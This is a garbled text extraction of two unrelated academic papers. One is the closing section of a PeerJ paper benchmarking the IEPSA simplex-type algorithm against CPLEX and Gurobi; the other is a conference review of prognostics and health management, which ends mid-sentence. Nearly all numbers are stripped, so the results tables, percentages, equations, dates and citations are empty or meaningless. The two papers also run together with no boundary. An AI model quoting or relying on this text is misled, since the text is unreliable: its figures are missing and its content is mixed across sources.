doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a set of benchmark problems (netlib, kennington, mészáros) that do not have bounds and ranges sections in their .mps files. all reported times were measured in seconds with built-in function cputime. the computing environment we used in the computational study is described in table , using the most up-to-date possible software versions. table presents detailed information about the computational study. the first column includes the name of the problem, the second the number of constraints, the third the number of variables, the fourth the nonzero elements of the matrix a and then the triplets of the results for all three algorithms in terms of cpu time and total number of iterations follow. finally the last three columns contain the optimal objective value reported by each algorithm. the test bed includes lps from netlib, kennington and mészáros collection. ordónez & freund ( ) have shown that nearly % of the netlib lps are ill-conditioned. hence, numerical difficulties may occur. we implemented an mps parser to read mps-files and convert data into matlab mat files. the proposed algorithm (iepsa) was implemented in mathworks matlab environment. the main reason for this choice was the support for high-level sparse matrix operations. four programming adjustments were used to improve the performance of memory bound code in matlab. those were: (i) store and access data in columns, (ii) avoid creating unnecessary variables, (iii) vectorization instead of for-loops and (iv) pre-allocate arrays before accessing them within loops. in order to handle numerical errors, tolerance scalars were introduced. the default values of the above mentioned tolerances were set equal to e− for all vectors and matrices for iepsa. for the basis update of iepsa, epsa and pdipsa we used the matlab lu factorization decomposition scheme. furthermore, to obtain the first (and only) interior point for iepsa we used a matlab interface under a mex-function provided for the mosek ipm (andersen & andersen, ; andersen & ye, ). this interface allowed us to modify appropriately the ipm so as to stop the solver directly after finding the first interior point. we emphasize that we used a zero objective function vector with mosek, and as a result mosek ipm is agnostic in directions pointing towards any existing optimal solutions. in this way, the claim that the first interior point we construct actually brings iepsa very close to the optimal solution already, is at least unsubstantiated. the pipeline representing how the total running times were calculated for the competing algorithms is shown in fig. . we did not use any scaling technique to solve successfully all tested benchmarks as the epsa pivoting scheme is scaling invariant (triantafyllidis & samaras, ). in table we present the arithmetic mean (a_mean) computed for both the total cpu time (in seconds) and number of iterations (niter). we present the execution time and the number of iterations of each algorithm over the netlib, kennington and mészáros set of lps included. we compare the performance of the proposed new algorithm (iepsa) against cplex (primal simplex) using its default settings and forcing the suite to use primal simplex (as iepsa also solves the primal problem) and gurobi (primal simplex) using the same method as well. the proposed algorithm performs fewer iterations on / benchmarks versus cplex and / versus gurobi. specifically, in terms of average number of iterations, iepsa performs . % less iterations than cplex and . % less iterations than gurobi. triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table description of the computing environment. cpu intel r©xeon tm e- ( . ghz @ cores - threads) ram size gb mhz ddr memory l cache size mb operating system windows pro x matlab version r b ( . . . ) update (build date: sept. ) mosek interior-point method v. . . (build date: june ) cplex primal simplex (ilog opt.studio) v. . (build date: march ) gurobi primal simplex v. . . in terms of cpu-time, cplex, iepsa and gurobi correspondingly required on average . , . and . seconds to solve all tested instances. even if the difference between iepsa and the commercial solvers is substantial, it is worthy to note that m-code (iepsa) is significantly slower than pure c implementations (mex-functions of cplex and gurobi), thus justifiable to witness in this computational study. however, the average number of iterations is irrelevant to the programming language used, and only relies on the algorithmic mechanics for each solver. therefore, it can be a transparent criterion to gain insight about practical performance among the competing algorithms. also, fig. shows the violin plots for the total number of iterations for all three algorithms across all tested benchmarks stratified by three levels of sparsity. finally, there have been observed differences in the optimal value between the solvers in the problems of the family largexxx. this has to do with the very nature of the problems themselves where numerical instability is highly present. iepsa tends to agree completely though with cplex objective values. conclusions in this paper we proposed a new non-monotonic simplex-type algorithm for solving lps. iepsa does not maintain monotonicity on the basic solutions but only on the interior point solutions. this new algorithm is a combination of three different methods. the computational results are very encouraging for the new algorithm. algorithm iepsa performs . % less iterations than cplex and . % less iterations than gurobi in a collection of well-known benchmarks. future work includes the extension of the computational studies to a larger number of tested problems from available benchmark collections, improving the cpu-time performance by implementing the algorithms to a low-level programming language and finally, implementing a tailored method to compute the first interior point rather than using a commercial ipm. triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table computational results on a selection of well known benchmark lps. cpu (s) niter objective value benchmark rows columns sparsity cplex iepsa gurobi cplex iepsa gurobi cplex iepsa gurobi adlittle . % . . . . e+ . e+ . e+ afiro . % . . . − . e+ − . e+ − . e+ agg . % . . . − . e+ − . e+ − . e+ agg . % . . . − . e+ − . e+ − . e+ agg . % . . . − . e+ − . e+ − . e+ bandm . % . . . − . e+ − . e+ − . e+ baxter . % . . . . e+ . e+ . e+ beaconfd . % . . . . e+ . e+ . e+ blend . % . . − . e+ − . e+ − . e+ bnl , . % . . . , , . e+ . e+ . e+ bnl , , . % . . . , , , . e+ . e+ . e+ brandy . % . . . . e+ . e+ . e+ cep , , . % . . . , , , . e+ . e+ . e+ cr , . % . . . . e+ . e+ . e+ cre_a , , . % . . . , , , . e+ . e+ . e+ cre_c , , . % . . . , , , . e+ . e+ . e+ degen . % . . . , − . e+ − . e+ − . e+ degen , , . % . . . , , , − . e+ − . e+ − . e+ e . % . . . , . e+ . e+ . e+ fffff . % . . . . e+ . e+ . e+ fxm - , , . % . . . , , , . e+ . e+ . e+ iiasa , . % . . . , , . e+ . e+ . e+ israel . % . . . − . e+ − . e+ − . e+ large , , . % . . . , , , . e+ . e+ . e− large , , . % . . . , , , . e+ . e+ . e+ large , , . % . . . , , , . e+ . e+ . e+ large , , . % . . . , , , . e+ . e+ . e+ large , , . % . . . , , , . e+ . e+ . e+ large , , . % . . . , , , . e+ . e+ . e+ large , , . % . . . , , , . e+ . e+ . e+ large , , . % . . . , , , . e+ . e+ . e+ lotfi . % . . . − . e+ − . e+ − . e+ multi . % . . . . e+ . e+ . e+ nemscem , . % . . . . e+ . e+ . e+ nsic . % . . . − . e+ − . e+ − . e+ nug . % . . . . e+ . e+ . e+ nw . % . . . , . e+ . e+ . e+ (continued on next page) triantafyllidis and s am aras ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) cpu (s) niter objective value benchmark rows columns sparsity cplex iepsa gurobi cplex iepsa gurobi cplex iepsa gurobi osa- , . % . . . , . e+ . e+ . e+ p . % . . . . e+ . e+ . e+ p . % . . . . e+ . e+ . e+ p . % . . . . e+ . e+ . e+ p . % . . . . e+ . e+ . e+ p . % . . . . e+ . e+ . e+ p . % . . . . e+ . e+ . e+ p , . % . . . . e+ . e+ . e+ refine . % . . . − . e+ − . e+ − . e+ rlfddd , . % . . . − . e+ − . e+ − . e+ rlfprim , , . % . . . . e+ . e+ . e+ route . % . . . , . e+ . e+ . e+ sc . % . . − . e+ − . e+ − . e+ sc . % . . − . e+ − . e+ − . e+ sc a . % . . − . e+ − . e+ − . e+ sc b . % . . − . e+ − . e+ − . e+ scagr . % . . . − . e+ − . e+ − . e+ scagr . % . . . − . e+ − . e+ − . e+ scagr - r- , , . % . . . , , , − . e+ − . e+ − . e+ scagr - r- . % . . . − . e+ − . e+ − . e+ scagr - r- , . % . . . − . e+ − . e+ − . e+ scagr - r- . % . . . − . e+ − . e+ − . e+ scagr - r- . % . . . − . e+ − . e+ − . e+ scfxm . % . . . . e+ . e+ . e+ scfxm - b- . % . . . . e+ . e+ . e+ scfxm - c- . % . . . . e+ . e+ . e+ scfxm - r- . % . . . . e+ . e+ . e+ scfxm - r- , , . % . . . , , , . e+ . e+ . e+ scfxm . % . . . . e+ . e+ . e+ scfxm , . % . . . . e+ . e+ . e+ scorpion . % . . . . e+ . e+ . e+ scrs , . % . . . . e+ . e+ . e+ scrs - r- b , . % . . . . e+ . e+ . e+ scsd . % . . . . e+ . e+ . e+ (continued on next page) triantafyllidis and s am aras ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) cpu (s) niter objective value benchmark rows columns sparsity cplex iepsa gurobi cplex iepsa gurobi cplex iepsa gurobi scsd , . % . . . , , . e+ . e+ . e+ scsd - b- . % . . . . e+ . e+ . e+ scsd - c- , . % . . . , . e+ . e+ . e+ scsd - c- . % . . . . e+ . e+ . e+ scsd - r- . % . . . . e+ . e+ . e+ scsd - r- , . % . . . . e+ . e+ . e+ scsd - r- b , . % . . . . e+ . e+ . e+ sctap . % . . . . e+ . e+ . e+ sctap - b- , . % . . . . e+ . e+ . e+ sctap - b- . % . . . . e+ . e+ . e+ sctap - c- , . % . . . . e+ . e+ . e+ sctap - c- . % . . . . e+ . e+ . e+ sctap - r- . % . . . . e+ . e+ . e+ sctap - r- . % . . . . e+ . e+ . e+ sctap - r- b . % . . . . e+ . e+ . e+ sctap , , . % . . . . e+ . e+ . e+ sctap , , . % . . . . e+ . e+ . e+ share b . % . . . − . e+ − . e+ − . e+ share b . % . . . − . e+ − . e+ − . e+ ship s , . % . . . . e+ . e+ . e+ slptsk , , . % . . . , , , . e+ . e+ . e+ stocfor . % . . . − . e+ − . e+ − . e+ a_mean . . . , . . . triantafyllidis and s am aras ( ),p eerj c om put. s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the pipeline showing how we gradually construct an appropriate .mat file format (mat- lab data file) to input in the competing algorithms and which segment of the pipeline we took into ac- count in calculating their total cpu running time. full-size doi: . /peerjcs. /fig- figure violin plots of number of iterations stratified by sparsity for all algorithms. full-size doi: . /peerjcs. /fig- acknowledgements a prodigious debt of gratitude goes to the memory of k. paparrizos for the introduction, inspiration and collaboration in the field of linear programming and operations research. triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we also wish to deeply thank john n. tsitsiklis for the insightful comments during the development of this work. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • charalampos p. triantafyllidis performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • nikolaos samaras conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/harrytr/iepsa_ . references amin gr, emrouznejad a. . optimizing search engines results using linear programming. expert systems with applications ( ): – doi . /j.eswa. . . . andersen ed, andersen kd. . the mosek interior point optimizer for linear programming: an implementation of the homogeneous algorithm. in: frenk h, roos k, terlaky t, zhang s, eds. high performance optimization. boston: springer us, – . andersen ed, ye y. . combining interior-point and pivoting algorithms for linear programming. management science ( ): – doi . /mnsc. . . . arsham h. . a hybrid gradient and feasible direction pivotal solution algorithm for general linear programs. applied mathematics and computation ( ): – doi . /j.amc. . . . basu a, loera jad, junod m. . on chubanov’s method for linear programming. informs journal on computing ( ): – doi . /ijoc. . . bertsimas d, tsitsiklis jn. . introduction to linear optimization. belmont: athena scientific. bixby re, gregory jw, lustig ij, marsten re, shanno df. . very large-scale linear programming: a case study in combining interior point and simplex methods. operations research ( ): – doi . /opre. . . . triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/harrytr/iepsa_ http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /mnsc. . . http://dx.doi.org/ . /j.amc. . . http://dx.doi.org/ . /ijoc. . http://dx.doi.org/ . /opre. . . http://dx.doi.org/ . /peerj-cs. bixby re, saltzman mj. . recovering an optimal lp basis from an interior point so- lution. operations research letters ( ): – doi . / - ( ) - . burdett rl, kozan e, sinnott m, cook d, tian yc. . a mixed integer linear programing approach to perform hospital capacity assessments. expert systems with applications : – doi . /j.eswa. . . . dantzig gb. . programming of interdependent activities: ii mathematical model. econometrica ( / ): – doi . / . dongarra j, sullivan f. . guest editors introduction: the top algorithms. computing in science & engineering ( ): – doi . /mcise. . . elhallaoui i, metrane a, desaulniers g, soumis f. . an improved primal simplex algorithm for degenerate linear programs. informs journal on computing ( ): – doi . /ijoc. . . fernndez s, borrajo d. . using linear programming to solve clustered oversubscrip- tion planning problems for designing e-courses. expert systems with applications ( ): – doi . /j.eswa. . . . fukuda k, terlaky t. . criss-cross methods: a fresh view on pivot algorithms. mathematical programming ( – ): – . gkioulekas i, papageorgiou lg. . piecewise regression analysis through informa- tion criteria using mathematical programming. expert systems with applications : – doi . /j.eswa. . . . glavelis t, ploskas n, samaras n. . improving a primal-dual simplex-type algorithm using interior point methods. optimization ( ): – doi . / . . . gleixner am, steffy de, wolter k. . iterative refinement for linear programming. informs journal on computing ( ): – doi . /ijoc. . . illes t, terlaky t. . pivot versus interior point methods: pros and cons. european journal of operational research ( ): – doi . /s - ( ) - . janssens gk, ramaekers km. . a linear programming formulation for an inventory management decision problem with a service constraint. expert systems with applications ( ): – doi . /j.eswa. . . . jurik t. . a nearest point approach algorithm for a class of linear programming problems. journal of applied mathematics, statistics and informatics (jamsi) : – . karmarkar n. . a new polynomial-time algorithm for linear programming. in: proceedings of the sixteenth annual acm symposium on theory of computing, stoc ’ . new york: acm, – doi . / . . khachiyan lg. . a polynomial algorithm in linear programming. doklady akademii nauk sssr : – . klee v, minty gj. . how good is the simplex algorithm? in: shisha o, ed. inequali- ties. vol. iii. new york: academic press, – . li w. . dual–primal algorithm for linear optimization. optimization methods software ( ): – doi . / . . . triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / http://dx.doi.org/ . /mcise. . http://dx.doi.org/ . /ijoc. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /ijoc. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. mehrotra s. . on the implementation of a primal-dual interior point method. siam journal on optimization ( ): – doi . / . mehrotra s. . quadratic convergence in a primal-dual method. mathematics of operations research ( ): – doi . /moor. . . . murty k, fathi y. . a feasible direction method for linear programming. operations research letters ( ): – doi . / - ( ) - . omer j, rosat s, raymond v, soumis f. . improved primal simplex: a more general theoretical framework and an extended experimental analysis. informs journal on computing ( ): – doi . /ijoc. . . ordónez f, freund rm. . computational experience and the explanatory value of condition measures for linear optimization. siam journal on optimization ( ): – doi . /s . pan pq. . a largest-distance pivot rule for the simplex algorithm. european journal of operational research ( ): – doi . /j.ejor. . . . pan pq. . an affine-scaling pivot algorithm for linear programming. optimization ( ): – doi . / . . . paparrizos k. . an infeasible (exterior point) simplex algorithm for assignment problems. math program ( ): – doi . /bf . paparrizos k. . an exterior point simplex algorithm for (general) linear program- ming problems. annals of operations research ( ): – doi . /bf . paparrizos k. . a new primal and dual pivoting rule for the simplex algorithm. in: proceedings of symopis. – . paparrizos k, samaras n, sifaleras a. . exterior point simplex-type algorithms for linear and network optimization problems. annals of operations research ( ): – doi . /s - - - . paparrizos k, samaras n, stephanides g. a. an efficient simplex type algorithm for sparse and dense linear programs. european journal of operational research ( ): – doi . /s - ( ) - . paparrizos k, samaras n, stephanides g. b. a new efficient primal dual simplex algorithm. computers and operations research ( ): – doi . /s - ( ) - . paparrizos k, samaras n, triantafyllidis c. . a computational study of exterior point simplex algorithm variations. in: th conference of the hellenic operational research society (eeee). spetses, greece, – . paparrizos k, samaras n, tsiplidis k. . pivoting algorithms for linear program- ming generating two paths. in: floudas ca, pardalos pm, eds. encyclopedia of opti- mization. nd edition. boston: springer, – doi . / - - - _ . samaras n. . computational improvements and efficient implementation of two path pivoting algorithms. phd thesis, dept. of applied informatics, university of macedonia. terlaky t. . a convergent criss-cross method. optimization ( ): – doi . / . triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /moor. . . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /ijoc. . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. terlaky t, zhang s. . pivot rules for linear programming: a survey on re- cent theoretical developments. annals of operations research ( ): – doi . /bf . triantafyllidis c, samaras n. . three nearly scaling-invariant versions of an exterior point algorithm for linear programming. optimization: a journal of mathematical programming and operations research ( ): – doi . / . . . triantafyllidis cp, papageorgiou lg. . an integrated platform for intuitive mathematical programming modeling using latex. peerj computer science :e doi . /peerj-cs. . yang l, liu s, tsoka s, papageorgiou lg. . mathematical programming for piecewise linear regression analysis. expert systems with applications : – doi . /j.eswa. . . . yeh wc, corley hw. . a simple direct cosine simplex algorithm. applied mathe- matics and computation ( ): – doi . /j.amc. . . . zhang s. . new variants of finite criss-cross pivot algorithms for linear program- ming. european journal of operational research ( ): – doi . /s - ( ) - . triantafyllidis and samaras ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bf http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.amc. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. your paper's title starts here: please center international conference on sensor network and computer engineering (icsnce ) a review on prognostics and health management nannan hu a , xiaohao su b and baolong liu c school of computer science and engineering xi’an technological university xi’an, , china a e-mail: @qq.com b e-mail: su-xiaohao@foxmail.com c e-mail: liu.bao.long@hotmail.com abstract—the health management of complex equipment is crucial to ensure the reliability, maintainability and safety of complex equipment. this paper introduces the basic concept and research connotation of prognostics and health management (phm), analyzes the significance of phm technology in equipment maintenance. for the fault prediction architecture and method, this paper focuses on the discussion, analysis, and summarizes the current research’s hot spots and existing technical difficulties. finally, the future research directions are also prospected. keywords-fault prognostics; health management; fault diagnosis; remaining life i. introduction with the rapid development of modern technologies, especially information technologies, the complexity, integration, and intelligence of a large number of complex systems are constantly increasing, and the costs of research, production, and especially maintenance and protection are increasing. at the same time, due to the increase of components and influence factors, the probability of failure and function failure gradually increases. therefore, the fault diagnosis and maintenance of complex systems gradually become the focus of researchers. phm [ - ] is gaining more and more attention. the concept of phm first appeared in military equipment, obtained applications in complex systems and equipment such as spacecraft, aircraft and nuclear reactors. with the continuous development of phm technology, phm has been gradually focused by many industrial fields in electronics, automobile, ships, the safety of engineering structures and other applications are also increasing [ - ]. the phm is a further extension of the build-in test (bit) and state’s health monitoring capabilities used for complex systems. it is a shift from state monitoring to health management, to identify and manage the occurrence of faults, planning maintenance and supply assurance. the main purpose is to reduce the maintenance costs, improve equipment system security and tasks’ success, achieve condition-based maintenance [ ] (cbm) and autonomous protection with less maintenance inputs. ii. connotation of phm a. the basic concept of phm phm contains two aspects, fault prognostics and health management. health refers to the performance’s degradation or deviation compared with the expected normal performance state. failure prognostics refers to the prediction based on the current or historical performance state of the system, diagnose its function, including determining the remaining life of the system or the length of time it is expected to work; health management is a ability to make appropriate decisions, based on diagnostic, prognostic information, available maintenance resources and usage requirements. phm represents a shift in approach, in maintenance strategy and conceptual, that enables a shift from traditional sensor- based diagnostics to prognostics based on intelligent systems, to provide accurate technical support at the right time. phm technology also makes after-hours maintenance or regular maintenance strategies are replaced by the situation of maintenance. this change can bring the following improvements to the actual equipment protection [ ]:  provide senior alarm of system failure.  provide condition-based maintenance ability.  improve the availability of the system through maintenance cycle extension.  reduce the cost of full life cycle by reducing inspection cost and failure time.  reduce the occurrence of intermittent and no fault founds (nff). b. connotation of phm in system function [ ], phm can achieve state monitoring, fault detection, failure prediction, the remaining life prognostics of key components or system; it is a combination of multiple frontiers and interdisciplinary. in the evolution of technology, it is the improvement of traditional equipment condition monitoring and fault diagnosis, emphasizing the discovery of equipment failure before the failure of early signs, tracking the development of fault symptoms while assessing the remaining useful life of the equipment, providing decision’s support for the maintenance of the equipment ultimately. the health degradation process of a device is a process in which the device's health status changes from normal to degressive until the function fails. equipment health degradation process is shown in [ - ] fig. . international conference on sensor network and computer engineering (icsnce ) e q u ip m e n t h e a lt h l e v e l failure occurred detection point current status point function failure pointnormal left life degraded performance failure . . . . . figure . equipment health degradation process. in view of the above typical equipment health degradation process, the fault system should have early fault detection capabilities, and monitor its degradation process. fault prognostics research includes the following aspects:  evaluate which health condition the current device is in its health degradation process: a normal state, a degraded performance state, or a functional failure state.  when the equipment is in a state of degraded performance, judging what kind of failure mode which causes its health level to drop, and evaluating the current state of health deviation from its normal state.  predicting the future state of health of equipment, it has two forms: ( ) study whether the equipment can complete its functional requirements normally in a period of time in the future ( ) study the remaining life of equipment iii. system application of phm a. phm’s framework phm systems generally should be capable of fault detection, fault isolation, enhanced diagnostics, performance testing, fault prognostic, health management, and component life tracking [ ]. most fault diagnosis and fault prognostic tools have domain-related features [ - ]. the phm technical system framework is shown in fig. . sensor pretreat analysis of telecommunication characteristics fmeca historical data and operational status data maintain task resources feature extraction signal processing fault classification prognostics prediction of failure evolution maintenance plan fault prediction maintain... current fault status cbm phm figure . framework for phm. the method system of phm technology is shown in fig. . firstly, evaluating the virtual life; through the input of design data, expected life cycle operating conditions, failure modes and failure impact analysis (fmmea) and physics-of-failure (pofs) models, etc., to achieve reliability (or virtual life) evaluation. fmeca is of great significance in the selection of design schemes, objective evaluation of relevant measures (such as unnecessary measures) and testing equipment, and at the same international conference on sensor network and computer engineering (icsnce ) time. in order to apply it to the design of fault prognostics and state management, the following parts should be added to the traditional fmea: the signs and symptoms before the failure mode occurs; the signs that the product or function may have been severely damaged; the signs of the failure mode are observed or the location of sensors; fault detection methods and fault prognostic methods [ ]. during fmeca analysis, when analyzing the cause of fault, it is also necessary to analyze the potential source of fault in depth, emphasizing the relationship between other products or external factors in the state of each other. if fmea analysis table further analyzes the "root cause of the fault" for the cause of the fault, it firstly analyzes the root fault mode, and identifies external manifestation of the root cause, and its functional impact on the subsystem or equipment. if there is no problem (such as temperature, degree of vacuum, normal pressure, etc.) through the detection or monitor, then it is no longer necessary to take the fmea analysis for the root cause of fault. design data expectation of life fmmca pof model virtual life assessment sensor data already available bus monitoring data maintain and test records system health status and pre-diagnosis status prediction of life loss based on pof failure signs early warning monitoring remaining life assessment full life cycle assurance and cost analysis figure . general methodology of phm [ ]. by performing a virtual life assessment, the major failure modes and failure mechanisms to be prioritized can be determined. existing sensor data, monitoring data, maintenance and inspection records can also be used to identify abnormal conditions and parameters. in the entire methodological system, prediction is the core method and research content to achieve system performance degradation status and remaining life prediction. b. fault prognostic model design of phm phm is a new system maintenance and management philosophy that significantly improves the understanding of the behavior of complex systems through comprehensive fault detection, isolation and prognostic and state management [ ]. at the same time, information on key components is also collected and processed to prognostic the remaining useful life. the realization of fault prognostics mainly depends on the model design. in view of the complicated system of phm, it is urgent to develop and design a general prognostic framework to select and integrate the appropriate methods of diagnosis and prediction. improve the utilization of information, and achieve multi-angle and multi-parameter prognostic, improve the level of diagnosis and prognostics [ ]. in order to accurately predict a fault before it occurs, it is necessary to capture the symptom of the fault by monitoring the change of the system state parameter. for a slowly changing fault, before the near failure occurs, the rate of change of the system state parameter usually increases sharply. therefore, it is the key to successfully predicting failures by reasonably determining the critical point of state change that is about to occur. first, based on the results of signal analysis, the analysis of the root cause of the failure, and the extension of fmeca results, the correlation equations between the model parameters i  (describe the overall state of the system) and the physical parameters j p (describe subsystems and part properties) is established as follows: )( ji pf ( ) estimating signal input and output parameter from the measurement, the estimated model parameter i  to calculate the actual physical parameters: )( i fp    ( ) determine the change of the actual physical parameter p relative to the nominal physical parameter value p [ ]. p is a reflection of the operational status of the equipment, whether the system is abnormal operating status, the size of the anomalies. they can be real-time described by p ’s value and changes. when setting up the correlation equation )( ji pf , the limit value should be international conference on sensor network and computer engineering (icsnce ) set to the value at the performance of the system suddenly begins to change drastically. observe the value of p in real time, according to the changes of p (whether exceed the critical value), as well as changes in the physical parameters, the corresponding relationship between the decision-making, to determine whether the failure will occur. finally, the use of statistical decisions or hypothesis testing, fault separation, to determine the impending failure causes, size and type [ ]. in addition, after the fault symptoms have been identified, fault trends should be analyzed to quantify the time since the device state was abruptly changed to the time when fault to occur. fault trends are closely related to the material properties, design, and structural characteristics of the equipment or component. so the speed and trend of fault development can be described by computer simulation. the relationship between the remaining life of the system and the running status and running time can finally be expressed in the form of a three-dimensional surface. fault prognostics output characteristic surface simulate as fig. . the x-axis represents time, the y-axis represents p that reflects the working status, and the z-axis represents the remaining life of the part or system. this figure can intuitively and accurately represent the remaining life of any part or system that corresponds to any operating state and any operating time point. figure . fault prediction output characteristic surface map. iv. algorithm of fault prognostic according to the theories, methods and technical routes applied in the actual research, the fault prognostics technology can be divided into three types [ - ]: as shown in fig. below: the prognostic techniques are divided into three categories: ( ) model-driven fault prognostics techniques; ( ) data-driven fault prognostics techniques; ( ) fault prognostics techniques based on statistical reliability (probability-based); the three methods in the engineering application of the extensive weakened in order, but the prognostics accuracy risen, the difficulty and cost associated with it also increased [ - ]. the following is a brief introduction to all kinds of forecasting methods. figure . algorithms of fault prognostics.. a. model-driven fault pragnostics techniques model-driven fault prognostic is a technique using either a dynamic model or process prognostics method. physical model approach, kalman/extended kalman filter/particle filter and expert-based methods can be classified in model-driven fault prognostics [ ]. model- based fault prognostics techniques generally require the mathematical models of the object system to be known. such methods provide a means of grasping the failure mode process of the component or system being predicted. by calculating the functional impairment under system operating conditions, to assess the loss of critical components and to assess the cumulative effects of failures in the use of the international conference on sensor network and computer engineering (icsnce ) components over the life, to evaluate the remaining useful life by integrating physical models with stochastic process modeling distribution. model-based fault prognostics techniques have the property of being able to penetrate the nature of the object system and the advantages of real-time. adams [ ] put forward the damage accumulation model of the first/second order nonlinear differential equation in the structural dynamic system. chelidze [ ] expressed the model of the performance degradation in the slow process; the process corresponds with time-varying. the model is used to track battery degradation (voltage). in [ ], a non-linear stochastic model is proposed to model the mechanical structure. the model uses the generalized kalman filter to estimate the current fault condition of the system in real time and predict the remaining life of the system. the literature [ - ] introduced estimating the residual life by estimating the two defect propagation models for a bearing-loaded mechanical model. luo [ ] proposed a data-based synthetic forecasting process using model-based simulation data under nominal and degraded conditions. at present, most of the model-based methods are used in electromechanical systems such as aircraft and rotating machinery. for complex electronic systems, because of failure mechanisms are relatively complicated, so the modeling of fault prognostic lags behind. b. data-driven fault pragnostics techniques compared with regression analysis and time series analysis [ ] in the traditional statistical category, neural network is one of the most used methods in fault prognostic methods and applications. unlike the model- based methods, neural networks are based on data-driven approaches that allow data to be self-adaptive can learn from samples, and try to capture intrinsic functional relationships between sample data. zhang and ganesan [ ] applied a self-organizing neural network to multivariate trend forecasting and applied to the prognostic of the remaining life of the bearing system. reference [ ] used recurrent neural networks (rnn) to predict system fault trends. and as the research progresses, many improved or special forms of neural network algorithms have emerged, such as wavelet neural networks (wnn), fuzzy neural networks (fnn), etc. these improved neural network algorithms have also achieved good results in fault diagnosis and prognostic. the data-driven fault prognostic technology does not need the prior knowledge (mathematical model and expert experience) of the object system, and based on the collected data, the hidden information can be obtained through various data analysis and processing methods to prognosticate the operation. thus, the shortcomings of the model and knowledge-based fault prognostics technology have become a more practical fault prognostics method. however, typical data (historical work data, fault injection data, and simulation experiment data) for some of the key devices in practice are usually very expensive to obtain; and even they are often highly uncertain and incompleteness, these problems all increase the difficulty of realizing the fault prognostic technology. c. fault pragnostics techniques based on statistical reliability this method requires less detail than model-based methods, because the information needed for the prognostic is contained in a series of different probability density functions (pdfs), without the need for dynamic differential equations. the advantage of this approach is that the required pdf can be obtained by analyzing the statistics, and the resulting pdf can provide sufficient support for the prognostic. in addition, the prognostic given by this method contains the confidence level, which can also well characterize the prognostic result. the typical fault probability curve based on statistical reliability is the famous "bathtub curve", as shown in fig . that is, the failure rate is relatively high at the beginning of the operation of the equipment or system. after a period of stable operation, the failure rate can generally be maintained at a relatively low level, and then, after a period of operation, the failure rate starts to increase again, until all parts or equipment have failed. equipment production characteristics, historical changes, performance degradation and other life-cycle factors make the fault prognostic based on system characteristics more complicated. all of these factors will have a certain probability impact on the prognostic results. also need to consider reducing fault prognostic false alarm rate. d. the comparison of fault prognostic algorithm through the literature to research, the commonly used prognostic algorithms are summarized, as shown in table : international conference on sensor network and computer engineering (icsnce ) table i. algorithms of fault prognostics algorithms of fault prognostics content advantage disadvantages time domain analysis directly use the waveform can directly show the different signals the amount of information that can be provided is relatively small fourier transform signal is decomposed into sinusoidal waves of different frequencies to distort the frequency domain suitable for smooth signal; frequency domain analysis of the signal unable to analyze in real time; the effect of non-stationary signal is not good principal component analysis through the original data into irrelevant feature data, in order to achieve the purpose of reducing the number of data reduce the dimensionality of the original data and retain the information of the original data linear conversion; applicability is not strong fisher linear discriminant find a map to reduce the original data to the minimum dimension reduce data to the lowest dimension while maintaining data resolution linear dimensionality reduction gaussian mixture model fusion of multiple gaussian probability density functions can approach any segment with arbitrary precision the parameter selection has a great influence on the model predictability kalman filter linear, unbiased, minimum variance criterion recursive valuation less calculation; high prognostic accuracy; better robustness only for linear systems we must first establish a system measurement model neural networks simulate the human nervous system, thro- ugh training of known data to establish the relationship in i/o good applicability, complex systems (including non-linear, non-stationary process) need a lot of data to train; select the neural network structure of the standard is not uniform expert system build a computer program with a great deal of expertise and experience to predict can constantly modify the original knowledge or learn new knowledge the establishment of knowledge base needs to be accumulated for a long time fuzzy technology prognostic the relationship between the fault symptom and the cause of the fault suitable for systems with less data and no accurate model; closer to the person's judgment process need a more accurate membership function; low accuracy v. phm outlook at present, china's national science and technology industry has a strong demand for phm technology. drawing on and absorbing foreign advanced experience, the study of phm key technologies can provide the basic technical reserve for the development of a new generation of weapons and equipment in our country, lay the foundation for engineering application and better promote the rapid development of china's national industry. there are following five aspects should be hard work. the process of fault prediction is 